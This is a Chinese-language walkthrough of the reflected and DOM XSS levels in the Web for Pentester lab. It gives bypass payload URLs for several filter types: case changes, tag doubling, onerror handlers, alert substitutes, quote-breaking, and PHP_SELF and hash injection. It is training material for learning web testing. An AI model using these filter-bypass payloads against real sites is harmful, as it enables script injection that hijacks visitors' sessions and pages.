Web_For_Pentester渗透测试环境中的xss注入关卡部分
Example 1
data:image/s3,"s3://crabby-images/ca357/ca357f5c88175a062d0bbf1fe0fdef24be7f5deb" alt=""
典型的反射型XSS,将我们通过GET方式输入的参数name直接输出
payload:http://192.168.187.141/xss/example1.php?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
data:image/s3,"s3://crabby-images/0c025/0c0254f4aace6387268ecf68373d2f25189a40ca" alt=""
Example 2
data:image/s3,"s3://crabby-images/c6913/c6913dc262ec20255326d2e67ad40349c7ce6933" alt=""
对GET方式输入的参数name进行正则匹配过滤,使用了函数preg_replace过滤了script标签:
1 | $name = $_GET['name']; |
但我们知道preg_replace是非常不安全的,有非常多的方法可以绕过,这里我们只需要利用大写即可非常轻松的绕过过滤
payload:http://192.168.187.141/xss/example2.php?name=%3CScript%3Ealert(%27xss%27)%3C/Script%3E
data:image/s3,"s3://crabby-images/f8435/f8435321b84638b63783b23c6989f823751eca2e" alt=""
Example 3
data:image/s3,"s3://crabby-images/5aeda/5aedafe6fceb2abbc00da7b73ef51f6ae0288e98" alt=""
这关同样是正则匹配过滤,区别于上一关的是这里用了匹配修饰符/i,所以不论大小写都会被过滤
1 | $name = $_GET['name']; |
所以我们换一种方式,双写即可绕过
data:image/s3,"s3://crabby-images/efe65/efe65f76d5ed4b8040748c0fcc243361a4756033" alt=""
Example 4
data:image/s3,"s3://crabby-images/713e5/713e55f0c0187db06a238478f22d3540eacb62dd" alt=""
这关通过正则匹配过滤了关键字script,并且通过修饰符/i无视大小写
1 | if(preg_match("/script/i",$_GET['name'])){ |
排除script,我们还可以通过onerror事件进行xss攻击
payload:
http://192.168.187.141/xss/example4.php?name=%3Cimg%20src=1%20onerror=alert(%22xss%22)%3E
data:image/s3,"s3://crabby-images/b9a12/b9a1208d96d22b1b5c8f86b22265999c7b3b0597" alt=""
Example 5
data:image/s3,"s3://crabby-images/60352/60352ceeda2e5399ac39198d69721020780aee02" alt=""
过滤了关键字alert,但是script未被过滤,除了alert外还有其他方法,如下
1 | alert() 弹出个提示框 (确定) |
payload:
http://192.168.187.141/xss/example5.php?name=%3Cscript%3Econfirm(%27xss%27)%3C/script%3E
http://192.168.187.141/xss/example5.php?name=%3Cscript%3Eprompt(%27xss%27)%3C/script%3E
data:image/s3,"s3://crabby-images/a4db3/a4db3fcb7476425a807837041d5bdf8ce8dd63f5" alt=""
data:image/s3,"s3://crabby-images/25f20/25f204fce71cdfb33837e366e076634acc342f75" alt=""
Example 6
data:image/s3,"s3://crabby-images/c3566/c3566b3596cebe4146f8c80c1c001a12e7064bbd" alt=""
这关是直接将我们输入的参数name的值赋值给脚本变量a,从页面源代码也可以看出
1 | Hello |
payload:
http://192.168.187.141/xss/example6.php?name=hacker%22;alert(%27xss%27);//
data:image/s3,"s3://crabby-images/4282c/4282c7c46cd4dcfe88bfbf5d0c8927dc3e57bacd" alt=""
Example 7
data:image/s3,"s3://crabby-images/0b639/0b63910c20485fa4db0cf1e039894f6ed4364b73" alt=""
这关区别在于是通过单引号闭合,所以将上一关的payload中的双引号改为单引号即可
payload:
http://192.168.187.141/xss/example7.php?name=hacker%27;alert(%27xss%27);//
data:image/s3,"s3://crabby-images/f8b1a/f8b1a9b1f8ec1d49222a1d360cfc0f47140338cf" alt=""
Example 8
本关的源代码如下:
1 | <?php |
可有发现参数name经过htmlentities函数处理,这是一个可以将html标签的尖括号转义的函数,所以我们无法通过参数name进行xss攻击,仔细一看这里面还有一个可控的参数$_SERVER[‘PHP_SELF’],来看看PHP手册对这个参数的说明:
1 | 'PHP_SELF' |
所以我们可以通过改变url来改变这个变量的值
payload:
data:image/s3,"s3://crabby-images/b619b/b619b66c3a58d8a91e27d527652cbf3cbf37a8f5" alt=""
这时看一下页面的源代码:
1 | <form action="/xss/example8.php/" method="POST"> <script>alert('xss')</script>" method="POST"> |
成功插入恶意脚本代码
Example 9
源代码:
1 | <script> |
location.hash是指url中#后面的内容,substring(1)从第一个字符开始
payload:
http://192.168.187.141/xss/example9.php#%3Cscript%3Ealert('xss')%3C/script%3E
但是这里没有弹框,有点奇怪